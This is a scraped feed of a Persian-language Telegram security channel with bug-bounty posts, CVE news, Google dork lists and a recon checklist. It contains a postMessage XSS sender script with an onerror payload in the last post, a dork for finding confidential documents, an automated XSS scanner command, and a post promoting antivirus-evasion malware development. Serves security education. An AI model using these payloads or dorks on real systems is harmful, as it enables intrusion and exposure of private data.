سیسکو اعلام کرده که یه ضعف امنیتی با شناسه CVE-2025-20352 توی نرمافزارهای IOS و IOS XE وجود داره که امکان اجرای کد دلخواه (Remote Code Execution, RCE) یا دچار کردن دستگاه به حالت عدم پاسخدهی (Denial of Service, DoS) رو فراهم میکنه.
این ضعف ناشی از بخش SNMP دستگاههاست یعنی همان سیستمی که برای مدیریت شبکه و مانیتور کردن دستگاهها استفاده میشه.
سیسکو گفته که این آسیبپذیری در حال حاضر داره به صورت عملی مورد سوءاستفاده قرار میگیره، یعنی هکرها ازش دارند استفاده میکنن.
⭐️ @ZeroSec_team
این ضعف ناشی از بخش SNMP دستگاههاست یعنی همان سیستمی که برای مدیریت شبکه و مانیتور کردن دستگاهها استفاده میشه.
سیسکو گفته که این آسیبپذیری در حال حاضر داره به صورت عملی مورد سوءاستفاده قرار میگیره، یعنی هکرها ازش دارند استفاده میکنن.
⭐️ @ZeroSec_team
❤7
بچه هایی که میخوایید از تست XSS خیالتون راحت باشه تا روی بقیه آسیب پذیری ها متمرکز بشید حتما از Reflix استفاده کنید حتما هم با سوییچ -he اجرا کنید تا تستون کامل بشه ،
کلا بعد استفاده ازش خیالتون میتونه راحت باشه از تست رفلکشن ها و پیدا کردن سینک ها و سورس های آسیب پذیر👌
Github
Recommended Command :
⭐️ @ZeroSec_team
کلا بعد استفاده ازش خیالتون میتونه راحت باشه از تست رفلکشن ها و پیدا کردن سینک ها و سورس های آسیب پذیر👌
Github
Recommended Command :
reflix -l urls -X GET -c 15 --dom --headless --xss -pi -hi -he
⭐️ @ZeroSec_team
❤6🔥1
RadvanSec
بچه هایی که میخوایید از تست XSS خیالتون راحت باشه تا روی بقیه آسیب پذیری ها متمرکز بشید حتما از Reflix استفاده کنید حتما هم با سوییچ -he اجرا کنید تا تستون کامل بشه ، کلا بعد استفاده ازش خیالتون میتونه راحت باشه از تست رفلکشن ها و پیدا کردن سینک ها و سورس…
GitHub
GitHub - rootDR/ex-param: ex-param is an automated tool designed for finding reflected parameters for XSS vulnerabilities. It crawls…
ex-param is an automated tool designed for finding reflected parameters for XSS vulnerabilities. It crawls a target website, extracts GET parameters, and tests them for reflected input. The tool he...
❤7
🔥Google Dork - Sensitive Docs 📄
⭐️ @Zerosec_team
ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute” site:example[.]com⭐️ @Zerosec_team
👍10❤1
محققای Rapid7 یک آسیب پذیری با شناسه ی CVE-2025-10184 و از نوع Blind SQL Injection، در سیستم عامل OxygenOS کشف و گزارش کردن که به یک برنامه، امکان دسترسی به داده ها و متادیتای SMS/MMS رو میده.
سیستم عامل OxygenOS، یک سیستم عامل مبتنی بر اندروید از شرکت چینی OnePlus، زیر مجموعه ی Oppo هستش.
محققا این آسیب پذیری رو یک مه، 11 اردیبهشت برای شرکت ارسال کردن، اما نتیجه ای نداشته، در نهایت گزارش فنی + PoC برای این آسیب پذیری رو بصورت عمومی منتشر کردن.
آسیب پذیری فعلا اصلاح نشده، بنابراین توصیه شده:
- برنامه های نصب شده روی گوشی رو به حداقل برسونید.
- به برنامه های معتبر از ناشران معتبر، اعتماد کنید.
- از احراز هویت دو عاملی مبتنی بر پیامک به برنامه های OTP مانند Google Authenticator مهاجرت کنید.
- با توجه به اینکه پیامک ها در دستگاههای OnePlus بدرستی ایزوله نشدن، توصیه شده ارتباطات حساس رو تنها از طریق اپلیکیشن های رمزگذاریشدهی سرتاسری (E2EE) انجام بدید.
- در ایران باید مراقب رمزهای دوم بانکی و ... هم باشیم.
#آسیب_پذیری_امنیتی
#PoC #OxygenOS #Oppo #OnePlus #CVE
⭐️ @ZeroSec_team
سیستم عامل OxygenOS، یک سیستم عامل مبتنی بر اندروید از شرکت چینی OnePlus، زیر مجموعه ی Oppo هستش.
محققا این آسیب پذیری رو یک مه، 11 اردیبهشت برای شرکت ارسال کردن، اما نتیجه ای نداشته، در نهایت گزارش فنی + PoC برای این آسیب پذیری رو بصورت عمومی منتشر کردن.
آسیب پذیری فعلا اصلاح نشده، بنابراین توصیه شده:
- برنامه های نصب شده روی گوشی رو به حداقل برسونید.
- به برنامه های معتبر از ناشران معتبر، اعتماد کنید.
- از احراز هویت دو عاملی مبتنی بر پیامک به برنامه های OTP مانند Google Authenticator مهاجرت کنید.
- با توجه به اینکه پیامک ها در دستگاههای OnePlus بدرستی ایزوله نشدن، توصیه شده ارتباطات حساس رو تنها از طریق اپلیکیشن های رمزگذاریشدهی سرتاسری (E2EE) انجام بدید.
- در ایران باید مراقب رمزهای دوم بانکی و ... هم باشیم.
#آسیب_پذیری_امنیتی
#PoC #OxygenOS #Oppo #OnePlus #CVE
⭐️ @ZeroSec_team
Rapid7
CVE-2025-10184: OnePlus OxygenOS Telephony provider permission bypass (NOT FIXED)
👍5
Forwarded from DarkBit
Advanced API Hashing Technology Using AES Encryption.pdf
1.5 MB
🔒 فناوری پیشرفته هش کردن API با رمزنگاری AES
📌 خلاصه:
در این مقاله تخصصی، ما به بررسی تکنیکهای پیشرفتهای نظیر مسمومسازی KnownDLLs پرداختهایم که بهطور کامل آنتیویروس قدرتمند Bitdefender را دور میزند.
این پژوهش، با تمرکز بر رمزنگاری AES و API Hashing ، ابزارها و استراتژیهایی را برای محققان امنیت سایبری و تیمهای قرمز ارائه میدهد تا در تکنیک های پیچیده امروزی پیشتاز باشند.
جزئیات این تکنیکهای نوآورانه و نحوه پیادهسازی آنها در دوره آموزشی آتی ما بهطور جامع تشریح خواهد شد.
#RedTeam #CyberSecurity #Maldev #امنیت_سایبری #توسعه_بدافزار #تیم_قرمز
💬 Forum
📣 DarkBit
📌 خلاصه:
در این مقاله تخصصی، ما به بررسی تکنیکهای پیشرفتهای نظیر مسمومسازی KnownDLLs پرداختهایم که بهطور کامل آنتیویروس قدرتمند Bitdefender را دور میزند.
این پژوهش، با تمرکز بر رمزنگاری AES و API Hashing ، ابزارها و استراتژیهایی را برای محققان امنیت سایبری و تیمهای قرمز ارائه میدهد تا در تکنیک های پیچیده امروزی پیشتاز باشند.
جزئیات این تکنیکهای نوآورانه و نحوه پیادهسازی آنها در دوره آموزشی آتی ما بهطور جامع تشریح خواهد شد.
#RedTeam #CyberSecurity #Maldev #امنیت_سایبری #توسعه_بدافزار #تیم_قرمز
💬 Forum
📣 DarkBit
👍3
این مقاله رو الان براتون نوشتم مطالعه کنید:
How Attackers Compromise Big Tech — From Bug Bounty to Incident Response
https://medium.com/@nexovir/if-youre-testing-large-tech-companies-like-google-to-stay-one-step-ahead-of-other-hunters-you-43959061e1e5
How Attackers Compromise Big Tech — From Bug Bounty to Incident Response
https://medium.com/@nexovir/if-youre-testing-large-tech-companies-like-google-to-stay-one-step-ahead-of-other-hunters-you-43959061e1e5
Medium
If you’re testing large tech companies like Google, To stay one step ahead of other hunters , You…
1. JS Files Monitoring -> Change -> New Attack Surface! (watch for new/changed JS bundles (can reveal hidden endpoints or secrets) Prefer…
❤3🔥1
How Attackers Compromise Big Tech — From Bug Bounty to Incident Response
If you’re testing large tech companies like Google, To stay one step ahead of other hunters , You must do the following:
1. JS Files Monitoring -> Change -> New Attack Surface! (watch for new/changed JS bundles (can reveal hidden endpoints or secrets) Prefer passive collection (CDNs, GitHub, public repos))
2. Daily Looking for New Url -> Let’s Check (Track sitemaps, Wayback, GitHub, Katana ,crawler-snapshots; alert on new paths)
3. Daily Parameter Discovery -> New Parameter -> Check Parameter on all Paths -> New Attack Surface (collect params from historical sources daily. Only run active parameter fuzzing when a new param/endpoint appears or it is explicitly in-scope)
4. Daily FUZZ Headers for find new Header (don’t run broad daily header fuzzing against large platforms. Run limited, low-rate tests only on in-scope endpoints or after detecting a relevant change)
5. Daily Check Certificates(crt.sh and CT logs) for find New Asset (good to run daily; finds new hostnames/subdomains quickly)
6. Daily DNS Bruteforce for find New Asset (use passive feeds for daily checks. Active DNS brute-force should be rare and only for in-scope targets (and low-rate))
7. Daily Port Scan on Company’s IPs for find new open PORT (avoid daily wide port scans on large org IPs. If you have permission, do scheduled, rate-limited scans and only on known in-scope infrastructure)
8. Daily FUZZ on Sensitive ENDPOINTs (Deep fuzzing should be scheduled (e.g., monthly or on-release) and only for endpoints clearly in-scope with conservative rate limits)
9. Search Daily for the latest ASNs (Track newly announced ASNs or IP ranges related to the company to spot new assets)
10. Daily Monitoring LinkedIn, GitHub, GitLab, etc (OSINT: Looking for new Connections) & Daily Google Dorking (not Recommanded)
(use TOR to BYPASS RESTRICTION)
⭐️ @ZeroSec_team
If you’re testing large tech companies like Google, To stay one step ahead of other hunters , You must do the following:
1. JS Files Monitoring -> Change -> New Attack Surface! (watch for new/changed JS bundles (can reveal hidden endpoints or secrets) Prefer passive collection (CDNs, GitHub, public repos))
2. Daily Looking for New Url -> Let’s Check (Track sitemaps, Wayback, GitHub, Katana ,crawler-snapshots; alert on new paths)
3. Daily Parameter Discovery -> New Parameter -> Check Parameter on all Paths -> New Attack Surface (collect params from historical sources daily. Only run active parameter fuzzing when a new param/endpoint appears or it is explicitly in-scope)
4. Daily FUZZ Headers for find new Header (don’t run broad daily header fuzzing against large platforms. Run limited, low-rate tests only on in-scope endpoints or after detecting a relevant change)
5. Daily Check Certificates(crt.sh and CT logs) for find New Asset (good to run daily; finds new hostnames/subdomains quickly)
6. Daily DNS Bruteforce for find New Asset (use passive feeds for daily checks. Active DNS brute-force should be rare and only for in-scope targets (and low-rate))
7. Daily Port Scan on Company’s IPs for find new open PORT (avoid daily wide port scans on large org IPs. If you have permission, do scheduled, rate-limited scans and only on known in-scope infrastructure)
8. Daily FUZZ on Sensitive ENDPOINTs (Deep fuzzing should be scheduled (e.g., monthly or on-release) and only for endpoints clearly in-scope with conservative rate limits)
9. Search Daily for the latest ASNs (Track newly announced ASNs or IP ranges related to the company to spot new assets)
10. Daily Monitoring LinkedIn, GitHub, GitLab, etc (OSINT: Looking for new Connections) & Daily Google Dorking (not Recommanded)
(use TOR to BYPASS RESTRICTION)
⭐️ @ZeroSec_team
👍2🔥2
اسکم پشت اسکم ای خدا مارو از این جبر جغرافیایی نجات بده
قضیه از این قراره هکروان هم بدون توضیحات خاصی اکانت هارو مسدود میکنه برای این کار افراد رو در رسانه های اجتماعی ردیابی و براساس یسری فرضیات و بدون مدرک خاصی، مسدود میکنه.
⭐️ @ZeroSec_team
قضیه از این قراره هکروان هم بدون توضیحات خاصی اکانت هارو مسدود میکنه برای این کار افراد رو در رسانه های اجتماعی ردیابی و براساس یسری فرضیات و بدون مدرک خاصی، مسدود میکنه.
⭐️ @ZeroSec_team
👍9🤣2👎1
تو این شرایط هوای هم دیگه رو داشته باشید سعی کنید تیم هایی باهم تشکیل بدید باهم کار کنید باگ بزنید و خودتون و خانوادتون رو از تورم و اقتصاد فاجعه این مملکت نجات بدید
من خودم تا چند وقت پیش میگفتم باگ بانتی اسکمه الان نظرم عوض شده🤣
⭐️ @ZeroSec_team
من خودم تا چند وقت پیش میگفتم باگ بانتی اسکمه الان نظرم عوض شده🤣
⭐️ @ZeroSec_team
👏11👍3
BugBounty Program Google Dorks (part1):
⭐️ @ZeroSec_team
inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
inurl:'/responsible disclosure' hoodie
responsible disclosure swag r=h:com
responsible disclosure hall of fame
inurl:responsible disclosure $50
responsible disclosure europe
responsible disclosure white hat
white hat program
insite:"responsible disclosure" -inurl:nl
intext responsible disclosure
site eu responsible disclosure
site .nl responsible disclosure
site responsible disclosure
responsible disclosure:sites
responsible disclosure r=h:nl
responsible disclosure r=h:uk
responsible disclosure r=h:eu
responsible disclosure bounty r=h:nl
responsible disclosure bounty r=h:uk
responsible disclosure bounty r=h:eu
responsible disclosure swag r=h:nl
responsible disclosure swag r=h:uk
responsible disclosure swag r=h:eu
responsible disclosure reward r=h:nl
responsible disclosure reward r=h:uk
responsible disclosure reward r=h:eu
"powered by bugcrowd" -site:bugcrowd.com
"submit vulnerability report"
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
site:*.gov.* "responsible disclosure"
intext:"we take security very seriously"
site:responsibledisclosure.com
inurl:'vulnerability-disclosure-policy' reward
intext:Vulnerability Disclosure site:nl
intext:Vulnerability Disclosure site:eu
site:*.*.nl intext:security report reward
site:*.*.nl intext:responsible disclosure reward
"security vulnerability" "report"
inurl"security report"
"responsible disclosure" university
inurl:/responsible-disclosure/ university
buy bitcoins "bug bounty"
⭐️ @ZeroSec_team
🔥4
BugBounty Program Google Dorks (part2):
⭐️ @ZeroSec_team
inurl:/security ext:txt "contact"
"powered by synack"
intext:responsible disclosure bounty
inurl: private bugbountyprogram
inurl:/.well-known/security ext:txt
inurl:/.well-known/security ext:txt intext:hackerone
inurl:/.well-known/security ext:txt -hackerone -bugcrowd -synack -openbugbounty
inurl:reporting-security-issues
inurl:security-policy.txt ext:txt
site:*.*.* inurl:bug inurl:bounty
site:help.*.* inurl:bounty
site:support.*.* intext:security report reward
intext:security report monetary inurl:security
intext:security report reward inurl:report
site:security.*.* inurl: bounty
site:*.*.de inurl:bug inurl:bounty
site:*.*.uk intext:security report reward
site:*.*.cn intext:security report reward
"vulnerability reporting policy"
"van de melding met een minimum van een" -site:responsibledisclosure.nl
inurl:responsible-disclosure-policy
"If you believe you've found a security vulnerability"
intext:"BugBounty" and intext:"BTC" and intext:"reward"
intext:bounty inurl:/security
inurl:"bug bounty" and intext:"€" and inurl:/security
inurl:"bug bounty" and intext:"$" and inurl:/security
inurl:"bug bounty" and intext:"INR" and inurl:/security
inurl:/security.txt "mailto*" -github.com -wikipedia.org -portswigger.net -magento
/trust/report-a-vulnerability
site:*.edu intext:security report vulnerability
"cms" bug bounty
"If you find a security issue" "reward"
"responsible disclosure" intext:"you may be eligible for monetary compensation"
inurl: "responsible disclosure", "bug bounty", "bugbounty"
intext: we offer a bounty
responsible disclosure inurl:in
site:*.br responsible disclosure
site:*.at responsible disclosure
site:*.be responsible disclosure
site:*.au responsible disclosure
site:*/security.txt "bounty"
inurl:bug bounty intext:"rupees"
inurl:bug bounty intext:"₹"
inurl:responsible disclosure intext:"INR"
"vulnerability disclosure program" AND (bounty OR reward OR swag OR "hall of fame")
"responsible disclosure" AND (monetary OR cash OR "gift card" OR crypto OR BTC)
"security@*" AND ("bug bounty" OR "vulnerability disclosure") ext:txt
"powered by yeswehack" OR "powered by federacy" OR "powered by intigriti" -site:yeswehack.com -site:federacy.com -site:intigriti.com
"submit vulnerability report" -site:hackerone.com -site:bugcrowd.com -site:synack.com -site:openbugbounty.org
inurl:/.well-known/security.txt intext:bounty -hackerone -bugcrowd -synack
⭐️ @ZeroSec_team
🔥5❤1
Forwarded from HuntLearn
🔔 استخدام کارشناس ارشد تست نفوذ اپلیکیشن
💰 حقوق: +۵۰ میلیون تومان
📍 محل همکاری: حضوری – تهران
بهصورت فوری بهدنبال جذب ۲ کارشناس تستنفوذ (میدل یا سینیور) هستیم.
🔑 شرایط و مهارتها:
تسلط کامل به تست نفوذ وباپلیکیشن
مسلط یا علاقهمند به تست نفوذ موبایل
توانایی کار تیمی و مسئولیتپذیری
🎯 اولویت با دانشجویان و فارغالتحصیلان «هانتلرن» خواهد بود.
💼 همکاری با شرایط عالی و حقوق رقابتی.
📩 برای ارسال رزومه اقدام بفرمایید:
@huntlearn_support
💰 حقوق: +۵۰ میلیون تومان
📍 محل همکاری: حضوری – تهران
بهصورت فوری بهدنبال جذب ۲ کارشناس تستنفوذ (میدل یا سینیور) هستیم.
🔑 شرایط و مهارتها:
تسلط کامل به تست نفوذ وباپلیکیشن
مسلط یا علاقهمند به تست نفوذ موبایل
توانایی کار تیمی و مسئولیتپذیری
🎯 اولویت با دانشجویان و فارغالتحصیلان «هانتلرن» خواهد بود.
💼 همکاری با شرایط عالی و حقوق رقابتی.
📩 برای ارسال رزومه اقدام بفرمایید:
@huntlearn_support
❤5
Adversarial_AI_Attacks.pdf
9.6 MB
#MLSecOps
#Tech_book
"Adversarial AI Attacks, Mitigations, and Defense Strategies: A cybersecurity professional’s guide to AI attacks, threat modeling, and securing AI with MLSecOps', 2024.
// The book is for cybersecurity professionals, such as security architects, analysts, engineers, ethical hackers, pentesters, and incident responders, but also developers and engineers designing, building, and assuring AI systems
⭐️ @Zerosec_team
#Tech_book
"Adversarial AI Attacks, Mitigations, and Defense Strategies: A cybersecurity professional’s guide to AI attacks, threat modeling, and securing AI with MLSecOps', 2024.
// The book is for cybersecurity professionals, such as security architects, analysts, engineers, ethical hackers, pentesters, and incident responders, but also developers and engineers designing, building, and assuring AI systems
⭐️ @Zerosec_team
❤2🔥1
Forwarded from GO-TO CVE (| | Sharo K h | |)
سرویس اوپن سورس formbricks یه cve خورده
۱۱ هزار star داره توی گیتهاب و بیشتر از ۱۰۰ تا Contributors
حالا باگش چی بوده
موقعی که jwt رو decode میکنه هیچ secret key یا الگوریتمی برای وریفای کردن استفاده نمیکنه
https://github.com/formbricks/formbricks/security/advisories/GHSA-7229-q9pv-j6p4
#CVE-2025-59934
۱۱ هزار star داره توی گیتهاب و بیشتر از ۱۰۰ تا Contributors
حالا باگش چی بوده
موقعی که jwt رو decode میکنه هیچ secret key یا الگوریتمی برای وریفای کردن استفاده نمیکنه
export const verifyToken = async (token: string): Promise<JwtPayload> => {
// First decode to get the ID
const decoded = jwt.decode(token);
const payload: JwtPayload = decoded as JwtPayload;
https://github.com/formbricks/formbricks/security/advisories/GHSA-7229-q9pv-j6p4
#CVE-2025-59934
GitHub
Missing JWT signature verification in formbricks
### **Denoscription**
---
**Vulnerability Overview**
This vulnerability stems from a token validation routine that only decodes JWTs (jwt.decode) without verifying their signatures. Both ...
---
**Vulnerability Overview**
This vulnerability stems from a token validation routine that only decodes JWTs (jwt.decode) without verifying their signatures. Both ...
❤5
https://cybersecuritynews.com/whatsapp-0-click-vulnerability-exploited/
از اسلاگش مشخصه درمورد چیه
⭐️ @ZeroSec_team
از اسلاگش مشخصه درمورد چیه
⭐️ @ZeroSec_team
Cyber Security News
WhatsApp 0-Click Vulnerability Exploited Using Malicious DNG File
WhatsApp 0-click remote code execution (RCE) vulnerability affecting Apple's iOS, macOS, and iPadOS platforms, detailed with a proof of concept demonstration.
❤3
Forwarded from Bugbountyhints
امروز داشتم یه ریپورتی در رابطه با postMessage میخوندم که دوست داشتم که اینجا بازش کنم :
ما یه همچین listener ای رو داریم :
خب حالا مشکل این listener چیه ؟ توی این قسمت if (!i داره چک میکنه که اگه referrer خالی باشه این شرط پاس بشه و مشکلی نداره پس اگه referrer ما خالی باشه دیگه به شرط بعدی e.origin نمیرسه و نکته مهمی که اینجا هست اینه که توی postMessage هیچ هدر referrer ای ست نمیشه پس اگه من یه sender داشته باشم به راحتی میتونم به اینجا Message بفرستم.
پس کد sender ما میشه :
حالا تو ادامه اش هم اومده بود یه route دیگه پیدا کرده بود که اونجا xss میخورد :
ما یه همچین listener ای رو داریم :
Receiver: function (e) {
var n, r = this.get("replaceRoute"), i = this.get("referrer");
if (!i || e.origin === normalize(i)) {
try { n = JSON.parse(e.data); } catch (u) {}
// ...
}
}خب حالا مشکل این listener چیه ؟ توی این قسمت if (!i داره چک میکنه که اگه referrer خالی باشه این شرط پاس بشه و مشکلی نداره پس اگه referrer ما خالی باشه دیگه به شرط بعدی e.origin نمیرسه و نکته مهمی که اینجا هست اینه که توی postMessage هیچ هدر referrer ای ست نمیشه پس اگه من یه sender داشته باشم به راحتی میتونم به اینجا Message بفرستم.
پس کد sender ما میشه :
win = window.open("https://transact.victim.com/");
win.postMessage(JSON.stringify({
action: "replaceRoute",
route: "application_error",
model: { error: 500, noscript: "injected", message: "from attacker" }
}), "*");حالا تو ادامه اش هم اومده بود یه route دیگه پیدا کرده بود که اونجا xss میخورد :
win.postMessage(JSON.stringify({
action: "replaceRoute",
route: "voucher.multi-product-details",
model: {
eligible: true,
sku: {
id: 0, longDenoscription: `
<img src=x onerror='alert(document.domain)'>`
}
}
}), "*");❤7🤣2